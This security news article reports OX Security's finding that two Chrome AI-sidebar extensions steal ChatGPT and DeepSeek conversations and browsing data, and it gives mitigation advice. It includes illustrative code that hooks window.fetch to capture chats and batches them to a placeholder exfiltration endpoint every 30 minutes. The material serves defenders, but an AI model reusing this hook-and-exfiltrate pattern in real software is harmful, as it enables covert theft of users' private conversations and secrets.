Malicious Chrome Extensions Steal AI Chat Conversations and Browsing Context

A pair of deceptively benign Chrome extensions, installed by hundreds of thousands of users, was exposed this week as active surveillance tooling. The extensions collect entire conversations with AI assistants (notably ChatGPT and DeepSeek), along with full browsing context, and exfiltrate that data to attacker-controlled servers; one variant still carried Google’s “Featured” badge as researchers alerted the platform owner.

(Image caption: dark UI showing ChatGPT and DeepSeek website content being read into a local database, with 30-minute exfiltration.)

Background / Overview

Browser extensions have long been a double-edged sword: they add productivity and convenience but run with powerful privileges inside the browser. That combination makes extensions attractive to legitimate developers and malicious actors alike. In a fresh case documented by OX Security, two Chrome extensions impersonating a legitimate AI-sidebar product were found to harvest user prompts and model outputs from ChatGPT and DeepSeek, persistently collect open-tab URLs and related metadata, and transmit that data to attacker-controlled command-and-control (C2) infrastructure. Installs across the two malicious listings totaled roughly 900,000 at the time of disclosure.

This incident sits on top of a string of recent discoveries showing how extension ecosystems have been weaponized: prior disclosures (most notably the Koi Security analyses and the long-running “ShadyPanda” campaigns) documented millions of installs for extensions that later received malicious updates and began harvesting sensitive data across AI platforms and popular web apps. Those earlier reports illustrated the same systemic weaknesses (auto-updates, broad host permissions, and opaque runtime behavior) that enabled scale in the current case.

What OX Security found: the malicious sidebar clones

Two extensions, one malicious pattern

OX Security’s analysis identifies two Chrome Web Store listings that implement an AI sidebar interface but also embed exfiltration logic:
  • Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI — reported at roughly 600,000 installs and observed carrying the Chrome “Featured” badge.
  • AI Sidebar with Deepseek, ChatGPT, Claude and more — reported at roughly 300,000 installs.
Both extensions reproduce the expected AITOPIA sidebar user experience (a familiar UI that lets users chat with LLMs directly inside a page), which lowers suspicion and drives adoption. Underneath that veneer, researchers found code that reads all website content and specifically detects chat pages for ChatGPT and DeepSeek, captures prompts and assistant responses in real time, stores them locally, and batches them to remote C2 hosts every 30 minutes.

Exact behavior observed

  • The extensions request broad host permissions (notably the ability to read all website content), then monitor open tabs for targeted AI domains. When a chat is detected, injected scripts extract both user prompts and the LLM responses.
  • Captured data is written to a local database (persistence on disk) to queue payloads for periodic exfiltration. The batch exfiltration occurs on an automated schedule (observed ~every 30 minutes) and targets C2 endpoints under attacker control.
  • The malicious flow asks for what is framed as permission to collect “anonymous, non-identifiable analytics” in order to appear legitimate; that prompt becomes the opt‑in vector for silent, high-fidelity collection.
  • The operators set up misleading privacy pages and uninstall redirects using the Lovable site builder to frustrate traceback and to push users toward reinstalling alternative malicious listings if one is removed. When one of the two malicious extensions is uninstalled, it attempts to open the other’s store page to trick users into reinstalling the alternate malicious variant.
These actions are not mere clickstream collection; they capture the substantive content of conversations that users explicitly type into AI chat interfaces—content that may include proprietary source code, business strategy, legal and medical questions, session tokens embedded in URL parameters, and other high-value secrets.

Why this matters: the sensitivity and weaponization risk

The combination of data types exfiltrated here creates a force‑multiplier for attackers:
  • High-fidelity content — raw prompts and model outputs can contain everything from API keys and code snippets to confidential legal text and PII. That gives adversaries direct access to the sensitive material users deliberately shared with an AI.
  • Context & identifiers — timestamps, conversation IDs, and model/platform identifiers make the data actionable for re‑identification, chaining across sessions, and timing attacks.
  • Full tab URLs and URL parameters — these can leak session tokens, internal corporate URLs, and query strings that reveal research topics or internal tools. Stealing such tokens enables lateral movement and account takeover in some cases.
The downstream monetization or misuse scenarios are stark: harvested chats can be weaponized for corporate espionage, identity theft, targeted phishing and business email compromise (BEC), and sold on underground or commercial data markets where behavioral and conversational intelligence is prized. Independent reporting and prior investigations show such data channels have real commercial value and have motivated similar campaigns targeting AI chats and browsing sessions.

Technical anatomy — how the interception works

Page-context capture vs network interception

The critical technical point is the capture location: when an extension injects code into the page context and hooks or wraps browser APIs (such as fetch or XMLHttpRequest), it operates where decrypted content is already available to JavaScript running in the page. TLS therefore does not protect the content from code running inside the browser process; the inject, parse, package, and forward model harvests chat content in plaintext regardless of transport-layer encryption.
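To make that concrete, here is a minimal, hedged sketch (not the extensions’ actual code; the chat-endpoint path is a hypothetical example) of how a page-context script can wrap window.fetch and read chat traffic in plaintext:

```typescript
// Illustrative sketch only: not the extensions' actual code.
// Runs in the page context, after TLS has been terminated, so request and
// response bodies are visible to the hook in plaintext.
const originalFetch = window.fetch.bind(window);

window.fetch = async (input: RequestInfo | URL, init?: RequestInit) => {
  const response = await originalFetch(input, init);

  // Hypothetical match for a chat API path on a targeted domain.
  const url =
    typeof input === "string" ? input : input instanceof URL ? input.href : input.url;

  if (url.includes("/backend-api/conversation")) {
    // Clone the response so the page still receives an unread body.
    response.clone().text().then((body) => {
      // Hand the captured plaintext to the extension's content script,
      // which can forward it to the background worker.
      window.postMessage({ type: "captured-chat", url, body }, "*");
    });
  }
  return response;
};
```

The same wrapping trick applies to XMLHttpRequest; the common thread is that the hook runs where the content is already decrypted.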

Typical flow observed in malicious sidebar clones

  • Tab monitoring detects a target domain (ChatGPT or DeepSeek).
  • An executor content script or injected module runs in the page context and wraps native network APIs to capture prompts and responses.
  • Captured content is relayed via window.postMessage to the extension’s content script, forwarded to the background worker, and persisted locally in an extension-scoped database.
  • A background job compresses and transmits batches to remote C2/analytics endpoints on a periodic schedule (observed: every 30 minutes); a minimal sketch of this relay-and-batch step follows.
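The relay-and-batch step needs remarkably little code, which is part of why static store review can miss it. A hedged, illustrative Manifest V3 service-worker sketch (hypothetical endpoint and storage key; assumes the storage and alarms permissions) might look like this:

```typescript
// Illustrative background service-worker sketch; hypothetical endpoint and storage key.
const C2_ENDPOINT = "https://analytics.example.invalid/collect"; // placeholder

// A content script (not shown) listens for the page's window.postMessage events
// and forwards captured chat data here via chrome.runtime.sendMessage.
chrome.runtime.onMessage.addListener((message) => {
  if (message?.type === "captured-chat") {
    chrome.storage.local.get({ queue: [] }, ({ queue }) => {
      queue.push({ ...message, ts: Date.now() });
      chrome.storage.local.set({ queue });
    });
  }
});

// Batch exfiltration on the observed ~30-minute cadence.
chrome.alarms.create("flush", { periodInMinutes: 30 });
chrome.alarms.onAlarm.addListener(async (alarm) => {
  if (alarm.name !== "flush") return;
  const { queue } = await chrome.storage.local.get({ queue: [] });
  if (queue.length === 0) return;
  await fetch(C2_ENDPOINT, { method: "POST", body: JSON.stringify(queue) });
  await chrome.storage.local.set({ queue: [] });
});
```

For defenders, the useful signature is the combination of broad host permissions, an alarms-driven schedule, and periodic POSTs to low-reputation “analytics” domains.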

Evasion and persistence tactics

  • Abuse of the extension auto‑update mechanism and default-on telemetry settings enables massive scale and stealth: millions of users can be opted into new runtime behavior without explicit re‑consent. This pattern featured prominently in earlier “sleeper” campaigns where extensions started benign and later switched behavior via an update.
  • Uninstall redirects and cross‑listing strategies aim to preserve presence: if a user removes one malicious variant, the extension opens the other listing to manipulate users into reinstalling. That behavior increases the chance of persistence across remediation attempts; the single API call involved is sketched below.
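The uninstall redirect itself costs the operators one call to a legitimate, documented extension API; the store URL below is a placeholder, not either extension’s real listing:

```typescript
// Illustrative only: when the extension is removed, the browser opens this URL,
// which the operators point at the sibling malicious listing. Placeholder ID.
chrome.runtime.setUninstallURL(
  "https://chromewebstore.google.com/detail/placeholder-extension-id"
);
```

Because the API is legitimate, the behavior leaves no unusual permission footprint and only becomes visible at uninstall time.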

How well-supported are the findings? Strengths and open questions

Evidence that is well-supported

  • The technical mechanics (page-context executor scripts, API hooking, background exfiltration) are reproducible and described in multiple independent analyses. Those behaviors are visible in code artifacts, extension manifests, and network telemetry pointing to attacker-controlled analytics endpoints.
  • Install counts and store metadata (the “Featured” badge, public install totals) are observable from the Chrome Web Store at disclosure time and corroborated by multiple outlets. The reported combined install base for the two extensions is ~900,000 (600k + 300k).

Claims that require cautious qualification

  • Assertions about who bought or consumed harvested chats—claims that data was sold to specific brokers or buyers—are plausible given the publisher’s disclosure language and historical patterns, but public forensic confirmation (transactional receipts or purchaser lists) has not been exhaustively documented. Treat downstream sale claims as credible leads that require further forensic evidence.
  • The total scope of exposure (how many active accounts and which specific corporate environments were affected) is estimated from store install counts and telemetry proxies; these figures are useful guidance for risk assessment but are not forensic counts of actively compromised hosts. Public install tallies include inactive installs and synced devices.

Timeline and disclosure (exact dates)

  • OX Security publicly disclosed the campaign and published a technical write-up on December 30, 2025, reporting the two malicious extensions and the exfiltration behavior.
  • OX Security says it reported the two extensions to Google on December 29, 2025; Google acknowledged the report the following day and told researchers it was reviewing it. As of the December 30 reporting window, the extensions remained available and one still bore the “Featured” badge while Google reviewed the case. Administrators should not treat a Featured badge as a guarantee that an extension is safe.

Immediate mitigation: a prioritized checklist for Windows users and IT teams

These steps are practical, immediate, and prioritized to reduce exposure quickly.
For individual Windows users (urgent, do this now)
  • Open chrome://extensions (or edge://extensions) and search for both listings:
  • Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI (extension ID reported by researchers).
  • AI Sidebar with Deepseek, ChatGPT, Claude and more (extension ID reported by researchers).
  • Uninstall any of the implicated extensions from every profile and browser instance. Manual removal is the only guaranteed way to stop an already-installed extension.
  • Assume any secrets pasted into AI chats while these extensions were installed are compromised. Rotate passwords, revoke and reissue API keys, and reset tokens that may have been shared.
  • Enable multi-factor authentication (MFA) on important accounts if not already enabled and closely monitor financial and email accounts for suspicious activity.
For enterprise/IT teams (immediate and short-term)
  • Implement a default-deny extension posture: use Group Policy (Chrome Enterprise), Intune, or other endpoint-management tooling to allowlist only verified extensions and block all others.
  • Scan endpoints for the specific extension IDs and hashes published by OX Security and remove them at scale; a starter sweep is sketched after this list. Use EDR and browser management APIs to orchestrate removal.
  • Hunt in proxy and EDR telemetry for outbound connections to identified C2/analytics domains (researchers published IoCs) and block those domains at the network edge.
  • Rotate any enterprise secrets that may have been posted into AI chats by affected employees and work with legal/compliance to assess breach notification obligations.
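As a starting point for that endpoint sweep, a hedged Node.js sketch (placeholder extension IDs; substitute the IDs from the published IoCs, and run with sufficient privileges to read other users’ profiles) can enumerate Chrome and Edge profiles on a Windows host:

```typescript
// Sketch: flag Windows browser profiles containing the implicated extension IDs.
// Placeholder IDs below; substitute the IDs published in the OX Security IoCs.
import { existsSync, readdirSync } from "node:fs";
import { join } from "node:path";

const SUSPECT_IDS = new Set([
  "placeholderextensionid000000001", // hypothetical
  "placeholderextensionid000000002", // hypothetical
]);

const BROWSER_ROOTS = [
  join("Google", "Chrome", "User Data"),
  join("Microsoft", "Edge", "User Data"),
];

const usersDir = "C:\\Users";
for (const user of readdirSync(usersDir)) {
  for (const root of BROWSER_ROOTS) {
    const userData = join(usersDir, user, "AppData", "Local", root);
    if (!existsSync(userData)) continue;
    // Each browser profile (Default, Profile 1, ...) keeps extensions under Extensions\<id>.
    for (const profile of readdirSync(userData)) {
      const extDir = join(userData, profile, "Extensions");
      if (!existsSync(extDir)) continue;
      for (const id of readdirSync(extDir)) {
        if (SUSPECT_IDS.has(id)) {
          console.log(`FLAGGED: ${user} | ${root} | ${profile} | ${id}`);
        }
      }
    }
  }
}
```

The sketch only identifies candidate hosts; actual removal should still go through EDR or browser-management tooling so the uninstall is enforced and logged.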
Longer-term enterprise controls
  • Centralize browser extension policy (allowlist/blocklist) and expand telemetry to detect page-context injections or unusual extension background network flows. Treat extension governance as a first-class security control.

Platform and policy failures that enabled this incident

This outbreak replays familiar systemic gaps in browser extension ecosystems:
  • Runtime behavior blind spot — static store reviews and manifest inspections cannot reliably detect code that activates only when specific domains load or that downloads additional payloads at runtime.
  • Auto-update abuse — automatic extension updates can silently switch benign extensions into surveillance tools without explicit re‑consent, turning an accumulated trust base into a mass distribution channel for malicious features.
  • Misplaced trust signals — store badges like “Featured” are often interpreted by users as safety guarantees. This incident shows badges alone are insufficient; runtime revalidation and transparent rationale for badges are needed.
Suggested platform fixes (practical and implementable)
  • Mandate dynamic runtime tests during extension review that simulate visits to common AI assistant domains and exercise domain-triggered behaviors in sandboxed environments.
  • Require re‑consent or manual review for updates that materially change data collection or add broad host permissions. Auto-updates should not be an unattended pathway for new surveillance features.
  • Expose more transparent metadata for trust badges: when was the last runtime revalidation performed, and what tests were run? Users deserve a clear explanation of what a badge actually means.

Critical analysis — strengths, limitations, and risks going forward

Strengths of the disclosure

  • The technical artifacts—extension IDs, version numbers, code structure, C2 domains and manifest entries—are concrete and reproducible, making the core technical claim robust. Multiple independent outlets and researcher communities reproduced the high-level mechanics, increasing confidence.

Limitations and what remains unproven

  • The precise chain of custody for harvested conversations beyond the publisher’s analytics endpoints is not yet exhaustively demonstrated in public forensic records; while the publisher’s privacy policy and observed telemetry suggest downstream sharing, definitive public proof of sales/contracts is still outstanding. Investigators and regulators should prioritize confirming downstream buyers and full data flows.
  • Install counts derived from store metadata are useful signals but do not equate to exact numbers of actively compromised devices or corporate exposures; organizations must perform endpoint scanning for precise impact assessments.

Strategic risks going forward

  • Copycats and scale: As AI chat becomes central to personal and professional workflows, adversaries have a clear incentive to replicate this model across other “popular” extension categories (free VPNs, productivity helpers, tab managers). Expect similar campaigns to follow until platform-level mitigations are enforced.
  • Data broker laundering: Even if the initial operator claims anonymization, the combination of textual content, timestamps, and session metadata can enable re‑identification and correlation with other datasets, reducing the protective value of “anonymized” claims.
  • Enterprise blind spots: Traditional EDR and network controls often do not see inside the browser page context; organizations must extend governance to browser-level policies and telemetry to close this blind spot.

Practical guidance for WindowsForum readers (quick reference)

  • Uninstall suspicious extensions immediately; check both Chrome and Edge profiles.
  • Rotate any credentials or API keys you pasted into AI chats after July 9, 2025: analysis of earlier campaigns shows auto-updates were used to flip extension behavior in mid‑2025, so treat any chats after that date as potentially exposed unless you can verify otherwise.
  • For organizations, deploy allowlists via enterprise policy and scan endpoints for the extension IDs and IoCs published by researchers.

Conclusion

This disclosure is a sharp reminder that convenience can be weaponized: browser extensions—especially those that promise privacy or improved AI integration—can quietly become mass surveillance tools when platform controls and runtime review are inadequate. The OX Security findings (and corroborating reporting across multiple outlets) show a practical, high-impact exploitation pattern: impersonate a trusted sidebar UI, request plausible analytics consent, capture plaintext AI conversations and browsing context inside the page, and exfiltrate them periodically to attacker endpoints. For consumers and enterprise defenders the response is immediate and non-negotiable: audit installed extensions, remove suspicious items, treat any secrets shared in AI chats as compromised, and harden browser governance. For platform owners and vendors, the remedy is structural: runtime behavioral testing, stronger update governance, and clearer provenance for trust badges. Without these measures, the convenience of in‑browser AI will continue to expand the attack surface for mass data harvesting—turning the very tools designed to increase productivity into a vector for large-scale privacy and corporate-security failures.

(Disclosure note: the analysis above draws on the OX Security technical write-up and contemporaneous reporting by multiple outlets; technical artifacts and IoCs published by researchers inform the mitigation steps and recommended enterprise actions described.)

Source: Security Boulevard, “Widely Used Malicious Extensions Steal ChatGPT, DeepSeek Conversations”
